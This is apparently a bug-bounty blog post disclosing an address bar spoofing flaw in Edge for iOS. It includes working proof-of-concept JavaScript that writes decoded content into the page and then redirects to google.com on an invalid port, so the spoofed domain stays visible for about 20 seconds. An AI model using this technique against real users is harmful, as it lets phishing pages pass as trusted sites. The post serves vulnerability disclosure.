Edge IOS Address Bar Spoof

Hello readers,

This post is about edge IOS address bar spoof vulnerability.

Address bar spoof vulnerability is an ability to keep legit URL in address bar
while loading the content from other domain. This makes user believe that the
content is actually served by a legit domain. For example browser is displaying
https://www.google.com in address bar or in omni-box while rendering the content
from https://www.evil.com

Original POC code:


<button onclick="window.open('http://lab-nick.codeanyapp.com/test.html')">


<html> <body> <script> window.onload = function() { var payload = "PGh0bWw+Cjxib2R5Pgo8aDE+QWRkcmVzcyBCYXIgU3B
vb2YgQEMwZDNHMzNrPC9oMT4KPC9ib2R5Pgo8L2h0bWw+"; document.write(atob(payload)); window.location = 'https://www.google.com:8888'; } </script> </body> </html>

The idea here is to write into document and then changing the location to invalid port URL.
Which engage the browser to keep displaying https://www.google.com:8888.
It results in displaying https://www.google.com:8888 while loading the content from
http://lab-nick.codeanyapp.com/ we can achieve 20+ seconds spoof using this bug.

Video POC:

According to Microsoft this issue is not severe enough to fix immediately
and hence will be fixed in upcoming releases.

Thanks for reading :)


Popular posts from this blog

How I bypassed 2-Factor Authentication in a bug bounty program

Story of a JSON XSS